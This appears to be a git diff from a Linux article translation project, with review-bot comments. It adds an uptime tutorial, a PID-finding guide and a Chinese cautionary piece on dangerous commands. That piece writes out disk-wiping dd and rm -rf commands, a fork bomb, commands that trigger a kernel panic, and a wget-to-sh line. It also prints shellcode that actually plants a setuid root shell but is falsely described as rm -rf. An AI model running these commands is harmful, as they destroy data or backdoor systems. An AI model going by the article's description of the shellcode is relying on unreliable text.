[2]:https://git.kernel.org/linus/64a48099b3b31568ac45716b7fafcb74a0c2fcfe
|
||||
[3]:https://lwn.net/Articles/741882/
|
||||
[4]:https://lwn.net/Articles/740393/
|
||||
[5]:https://lwn.net/Articles/741883/
|
||||
[6]:https://lwn.net/Articles/117749/
|
||||
[7]:http://man7.org/linux/man-pages/man2/modify_ldt.2.html
|
||||
[8]:https://lwn.net/Articles/738975/
|
||||
|
||||
|
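Review bot: the reference block at the end of this file needs cleanup before the translated copy reuses it. `[a]` points at the same `SubscriberLink/741878/...` URL as the `via:` line instead of an author page, and `[1]` (the `Promo/slink-trial2-2/claim` link) is defined but never referenced in the body. On the first line the claim marker and the title are fused into one line ("Translating by qhwdw The current state of kernel page-table isolation"), so the heading underline applies to both. In the last "Details" paragraph, "`nopti`command-line" is missing a space.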
@ -1,3 +1,5 @@
|
||||
translating----geekpi
|
||||
|
||||
What Is A Web Crawler? How Web Crawlers work?
|
||||
======
|
||||

|
||||
|
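Review bot: the claim line added at the top, `translating----geekpi`, uses four hyphens, while the same translator's marker elsewhere in this merge is `translating---geekpi` and other files use "Translating by NAME". If anything greps for claim markers, the variants will be missed; pick one form and use it here.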
@ -1,3 +1,4 @@
|
||||
Translating by qhwdw
|
||||
# [The mysterious case of the Linux Page Table Isolation patches][14]
|
||||
|
||||
* * *
|
||||
@ -135,3 +136,5 @@ via: http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-
|
||||
[13]:http://t.umblr.com/redirect?z=https%3A%2F%2Farxiv.org%2Fabs%2F1710.00551&t=ZjAyMDUzZWRmYjExNGNlYzRlMjE1NTliMTI2M2Y4YjkxMTFhMjI0OCxXRG55eVpXNw%3D%3D&b=t%3AqBH2b-yWL63V8acbuG-EUQ&p=http%3A%2F%2Fpythonsweetness.tumblr.com%2Fpost%2F169166980422%2Fthe-mysterious-case-of-the-linux-page-table&m=1
|
||||
[14]:http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table
|
||||
[15]:http://pythonsweetness.tumblr.com/
|
||||
|
||||
|
||||
|
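Review bot: the only change in this hunk (`-135,3 +136,5`) is two blank lines appended after `[15]` at the end of the file. They add nothing to the translation claim made in the first hunk and should be dropped to keep the diff to the one marker line. While the reference list is open, `[13]` goes through a `t.umblr.com/redirect` tracking URL that wraps `https://arxiv.org/abs/1710.00551`; link to the arXiv address directly so the reference does not depend on the redirector.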
@ -0,0 +1,103 @@
|
||||
translating by lujun9972
|
||||
Linux uptime Command Explained for Beginners with Examples
|
||||
======
|
||||
|
||||
If you are a Linux newbie, and have interest in system administration, or you want to become a power user, then you need to have a solid knowledge of the command line. There are several commands that you should know about, and one of them is **uptime**. In this article, we will discuss the basics of this command using some easy to understand examples.
|
||||
|
||||
But before that, it's worth mentioning that all examples used in this tutorial have been tested on an Ubuntu 16.04 machine.
|
||||
|
||||
## Linux uptime command
|
||||
|
||||
As the name suggests, the uptime command gives you the time for which the system has been up (or running). Here's its syntax:
|
||||
|
||||
```
|
||||
uptime [options]
|
||||
```
|
||||
|
||||
And here's is the way the tool's man page explains it:
|
||||
```
|
||||
uptime gives a one line display of the following information. The current time, how long the system
|
||||
has been running, how many users are currently logged on, and the system load averages for the past
|
||||
1, 5, and 15 minutes.
|
||||
```
|
||||
|
||||
The following Q&A-styled examples should give you a better idea on how the uptime command works.
|
||||
|
||||
### Q1. How to use the uptime command
|
||||
|
||||
Uptime's basic usage is very easy - just write the command's name and press enter.
|
||||
|
||||
uptime
|
||||
|
||||
Here's the kind of output the tool produces:
|
||||
|
||||
[![How to use the uptime command][1]][2]
|
||||
|
||||
So the first entry is the current time, then 'up' shows the system is running, 5:53 is the total time for which the system has been up, and then finally are the system load averages. Just in case you want to know more, here's what the uptime man page says about the last entry:
|
||||
```
|
||||
System load averages is the average number of processes that are either in a runnable or
|
||||
uninterruptable state. A process in a runnable state is either using the CPU or waiting to use the
|
||||
CPU. A process in uninterruptable state is waiting for some I/O access, eg waiting for disk.
|
||||
|
||||
The averages are taken over the three time intervals. Load averages are not normalized for the
|
||||
number of CPUs in a system, so a load average of 1 means a single CPU system is loaded all the
|
||||
time while on a 4 CPU system it means it was idle 75% of the time.
|
||||
```
|
||||
|
||||
### Q2. How to make the tool show up time in pretty format
|
||||
|
||||
In case you just want to know the time for which the system has been up, and that too in a more human-readable format, use the **-p** command line option.
|
||||
|
||||
```
|
||||
uptime -p
|
||||
```
|
||||
|
||||
Here's the output this command produced in our case:
|
||||
|
||||
[![make the tool show up time in pretty format][3]][4]
|
||||
|
||||
You can also make uptime specifically display the time/date since when the system has been running. This can be done using the **-s** command line option.
|
||||
|
||||
uptime -s
|
||||
|
||||
Here's the output the command produced in our case:
|
||||
|
||||
[![make uptime display date/time since when system is up][5]][6]
|
||||
|
||||
### Q4. How to get version information and help in general
|
||||
|
||||
Use the -V option to get version information, and -h for general help.
|
||||
|
||||
```
|
||||
uptime -V
|
||||
|
||||
uptime -h
|
||||
```
|
||||
|
||||
[![How to get version information and help][7]][8]
|
||||
|
||||
### Conclusion
|
||||
|
||||
As you'd have observed, the uptime command is easy to understand and use. It doesn't offer many features (or command line options). What all it offers have been discussed here. So just practice these options and you should be ready to use uptime in your day-to-day work. Just in case you require, here's the tool's [man page][9].
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.howtoforge.com/linux-uptime-command/
|
||||
|
||||
作者:[Himanshu Arora][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.howtoforge.com
|
||||
[1]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-basic-usage1.png
|
||||
[2]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-basic-usage1.png
|
||||
[3]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-p-option.png
|
||||
[4]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-p-option.png
|
||||
[5]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-s.png
|
||||
[6]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-s.png
|
||||
[7]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-v-h.png
|
||||
[8]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-v-h.png
|
||||
[9]:https://linux.die.net/man/1/uptime
|
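Review bot: the question headings skip from "### Q2" to "### Q4". The paragraph introducing the **-s** option ("You can also make uptime specifically display the time/date since when the system has been running") reads like the body of a missing Q3, so either give it its own heading or renumber the later one. In the same file, `uptime` and `uptime -s` are left as bare lines while `uptime -p`, `uptime -V` and `uptime -h` are fenced, and "And here's is the way" has a doubled verb. The footer credits a translator and still carries the placeholder 校对者ID, yet the visible body is entirely English; please confirm the file is in the intended state before merging.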
@ -0,0 +1,105 @@
|
||||
Linux 中 4 个简单的找出进程 ID(PID)的方法
|
||||
======
|
||||
每个人都知道 PID,究竟什么是 PID?为什么你想要 PID?你打算用 PID 做什么?你脑子里有同样的问题吗?如果是这样,你就找对地方了解这些细节了。
|
||||
|
||||
主要地,我们查询 PID 来杀死一个没有响应的程序,它类似于 Windows 任务管理器。 Linux GUI 也提供相同的功能,但 CLI 是执行 kill 操作的有效方法。
|
||||
|
||||
### 什么是进程 ID?
|
||||
|
||||
PID 代表进程标识号(process identification),它在大多数操作系统内核(如 Linux、Unix、macOS 和 Windows)中使用。它是在操作系统中创建时自动分配给每个进程的唯一标识号。一个进程是一个正在运行的程序实例。
|
||||
|
||||
**建议阅读:** [如何查看 Apache Web 服务器在 Linux 中的运行时间][1]
|
||||
|
||||
除了 init 进程外其他所有的进程 ID 每次都会改变,因为 init 始终是系统上的第一个进程,并且是所有其他进程的父进程。它的 PID 是 1。
|
||||
|
||||
PID 默认的最大值是 `32,768`。可以在你的系统上运行 `cat /proc/sys/kernel/pid_max` 来验证。在 32 位系统上,32768 是最大值,但是我们可以在 64 位系统上将其设置为最大 2^22(约 4 百万)内的任何值。
|
||||
|
||||
你可能会问,为什么我们需要这么多的 PID?因为我们不能立即重用 PID,这就是为什么。另外为了防止可能的错误。
|
||||
|
||||
系统正在运行的进程的 PID 可以通过使用 pidof、pgrep、ps 和 pstree 命令找到。
|
||||
|
||||
### 方法 1:使用 pidof 命令
|
||||
|
||||
pidof 用于查找正在运行的程序的进程 ID。它在标准输出上打印这些 id。为了演示,我们将在 Debian 9(stretch)系统中找出 Apache2 的进程 ID。
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
从上面的输出中,你可能会遇到难以识别进程 ID 的问题,因为它通过进程名称显示了所有的 PID(包括父进程和子进程)。因此,我们需要找出父 PID(PPID),这是我们要查找的。它可能是第一个数字。在本例中,它是 `3754`,并按降序排列。
|
||||
|
||||
### 方法 2:使用 pgrep 命令
|
||||
|
||||
pgrep 遍历当前正在运行的进程,并将符合选择条件的进程 ID 列到标准输出中。
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
这也与上面的输出类似,但是它将结果从小到大排序,这清楚地说明父 PID 是最后一个。在本例中,它是 `3754`。
|
||||
|
||||
**注意:** 如果你有多个进程的进程 ID,那么在使用 pidof 和 pgrep 识别父进程 ID 时可能会遇到麻烦。
|
||||
|
||||
### 方法 3:使用 pstree 命令
|
||||
|
||||
pstree 将运行的进程显示为一棵树。树的根是 pid,如果省略了 pid 那么就是 init。如果在 pstree 命令中指定了用户名,则显示相应用户拥有的所有进程。
|
||||
|
||||
pstree 通过将它们放在方括号中并添加重复计数前缀来可视化地合并相同的分支。
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
要单独获取父进程,请使用以下格式。
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
pstree 命令非常简单,因为它分别隔离了父进程和子进程,但这在使用 pidof 和 pgrep 时命令不容易。
|
||||
|
||||
### 方法 4:使用 ps 命令
|
||||
|
||||
ps 显示活动进程的选择信息。它显示进程 ID(pid=PID)、与进程关联的终端(tname=TTY)、以 [DD-]hh:mm:ss 格式(time=TIME)的累计 CPU 时间、以及执行名(ucmd = CMD)。输出默认是未排序的。
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
从上面的输出中,我们可以根据进程的启动日期轻松地识别父进程 ID(PPID)。在此例中,apache2 启动于 `Dec11`,它是父进程,其他的是子进程。apache2 的 PID 是 `3754`。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
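Review bot: the closing sentence of 方法 3, "pstree 命令非常简单,因为它分别隔离了父进程和子进程,但这在使用 pidof 和 pgrep 时命令不容易。", has a misplaced "命令" and reads as broken; "但使用 pidof 和 pgrep 命令时这并不容易" would fix it. The text also uses "父 PID(PPID)" for the parent process's own PID (`3754`), and picks the parent out only by its position in the sorted output or by the `Dec11` start time, so a tighter wording or a translator's note would help readers. The `ps aux | grep "apache2"` output includes the `grep apache2` process itself (PID 5648), which the explanation never mentions. The footer still has the placeholder 校对者ID.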
@ -0,0 +1,182 @@
|
||||
一些您不应该使用的 Linux 命令
|
||||
======
|
||||
当然,除非你想干掉你的机器。
|
||||
|
||||
蜘蛛侠有这样的一句信条, "权力越大,责任越大。" 对于 Linux 系统管理员们来说,这也是一种适合采用的明智态度。
|
||||
|
||||
不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [not patching Apache Struts][1] 。
|
||||
|
||||
如果不能停留在安全补丁之上,将会带来一个远超过系统管理员工资等级的战略性业务问题。这里就有一些足以攻击 Linux 服务器的方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。
|
||||
|
||||
下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。
|
||||
|
||||
警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。
|
||||
|
||||
那么,继续!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,他能删除一切,我说的是,能删除所有存在你系统里的内容!
|
||||
|
||||
和大多数 [Linux commands][2]一样,‘rm’这个核心指令使用起来非常方便。即便是最顽固的文件他也能帮你删除。结合起后面两个参数理解‘rm’指令时,你很容易陷入沉思:‘-r’,强制递归删除所有子目录,‘-f’,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
|
||||
|
||||
如果你真这么干了,想想该怎么和老板解释吧!
|
||||
|
||||
现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧 [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> 我在IT界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了‘rm- f’
|
||||
>
|
||||
> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个‘cp -R’去复制我需要的内容。
|
||||
>
|
||||
> 在我的聪明才智下,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
|
||||
>
|
||||
> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我的脑子被‘rm -R ./videodir/* ../companyvideodirwith651vidsin/’这样一条命令自动驱使。
|
||||
|
||||
然后,当文件在一片空白后归档,公司的视频文件才出现。幸运的是,在疯狂敲击‘control -C’后,得以在删除大量文件之前,中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。
|
||||
|
||||
事实上,绝大部分现代操作系统都会在你烦这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。
|
||||
|
||||
这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
这是什么?这是 16 进制的‘rm -rf’写法。在你不明确这段代码之前,请不要运行这条命令。
|
||||
|
||||
### fork 炸弹
|
||||
|
||||
既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
对你来说,这可能看起来有些神秘,但是我看来,它很像那个臭名昭著的 [Bash fork bomb][4]。反复启动新的 Bash shell ,直到你的系统资源消耗殆尽直至系统崩溃。
|
||||
|
||||
不应该在最新的 Linux 系统上做这些操作。注意,我说的是不应该。我没有说不能。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变式 [Bash fork bomb variants][5]),你就需要反复敲击关机命令直到系统重启了。
|
||||
|
||||
### 垃圾数据重写硬盘
|
||||
|
||||
有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
|
||||
|
||||
但是仅仅在你的存储器里制造最豪华的混乱,是很难彻底清除数据的:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
在我说“any command,”时,意味着可以输出任意命令,比如:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…引导目录列表到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。相比于盲目恐慌,这才是这天工作的一个好的开始。或者,把它换成 [career-limiting crisis][7]。
|
||||
|
||||
### 擦除硬盘!
|
||||
|
||||
历来另一个受欢迎的擦除硬盘的方式是执行:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
你可以用这条命令写入数据到你的硬盘设备。‘dd’命令可以从特殊文件中获取无尽个‘0’字符,并且将它全部写入你的设备。
|
||||
|
||||
可能现在 /dev/zero 目录觉得这是个愚蠢的想法,但是它真的管用。比如说,你可以使用 [clear unused space in a partition with zeros][8]。它能使分区里的图片压缩到更小以便于数据传输或是存档使用。
|
||||
|
||||
在另一方面,它和 `dd if=/dev/random of=/dev/hda` 近源,除了能毁掉你的一天之外,它并不友善。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。为了隐藏去接管办公室咖啡机的秘密计划,不错,这是一个粗糙的方法,但是你可以使用 DBAN 工具去更好得完成你的任务。
|
||||
|
||||
### /dev/null 的损失
|
||||
|
||||
也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘存储仓库数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行‘mv / /dev/null’或者‘>mv ’。
|
||||
|
||||
在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的目录 ‘/dev/null’。在后者,你仅仅把家目录喂给这个空空如也的目录,‘/dev/null’。任何一种情况下,除非备份还原,你再也不会再看见你的数据了。
|
||||
|
||||
451个研究报告指出,当提到容器的时候,都不要忽略数据持久和数据存储。
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
见鬼,难道会计无论如何都真的不需要最新的应收账款文件吗?
|
||||
|
||||
### 格式化错了驱动器
|
||||
|
||||
有时候你必须使用这一条命令格式化驱动器:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…它在格式化 ext3 文件系统的主硬盘驱动器。别,请等一分钟!你正在格式化你的主驱!难道你不需要用它?
|
||||
|
||||
当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块还是你正在使用的那块,它们是是固态,闪存还是其他氧化铁。
|
||||
|
||||
### 内核崩溃
|
||||
|
||||
一些 Linux 命令不能让你的机器长时间计算。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,你可以自己解决。
|
||||
|
||||
当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这会有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
|
||||
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
这些都会导致内核崩溃。
|
||||
|
||||
不要运行你并不了解它功能的命令,它们都在提醒我…
|
||||
|
||||
### 提防未知脚本
|
||||
|
||||
年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?这样,它们找到了一个很酷的脚本,并且承诺会自动检查所有备份。它们匆匆得拿走了这样一个命令:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
这个下载脚本将输出到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本可能已经被这个恶意软件毒害。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你把位置代码运行在 root 用户上,什么可能会发生。这个危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑--由于你没有花时间去读它。
|
||||
|
||||
你认为你不会干那样的事?告诉我,所有会有这些事情发生 [container images you're running on Docker][10]?你直到它们到底在运行着什么吗?我见过太多都未验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
|
||||
|
||||
### 结束
|
||||
|
||||
这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样负责任的使用你的权限。
|
||||
|
||||
我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我那些 Linux命令在你的“[Never use this!][13]”的清单上。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/CYLeft)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
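Review bot: in the "/dev/null 的损失" section the second command is garbled as ‘>mv ’, while the next paragraph says the latter form feeds the home directory to /dev/null, so the command's arguments were lost in translation and should be restored from the source article. Several typos change the meaning and need fixing: "位置代码" should be "未知代码" and "你直到它们" should be "你知道它们" in the 提防未知脚本 section, "烦这些错误" should be "犯这些错误", and "是是固态" has a doubled character. "/dev/zero 目录" calls a device file a directory, and the sentence around it ("可能现在 /dev/zero 目录觉得这是个愚蠢的想法") does not parse. The promotional lines "451个研究报告指出…" and "[Get the report][9]" are an advertisement from the source page rather than article text and should be dropped. Link texts such as "[not patching Apache Struts][1]" and "[Bash fork bomb variants][5]" are left untranslated, the quoted command ‘rm- f’ has its space in the wrong place, and the footer still reads "[译者ID]" and "[校对者ID]".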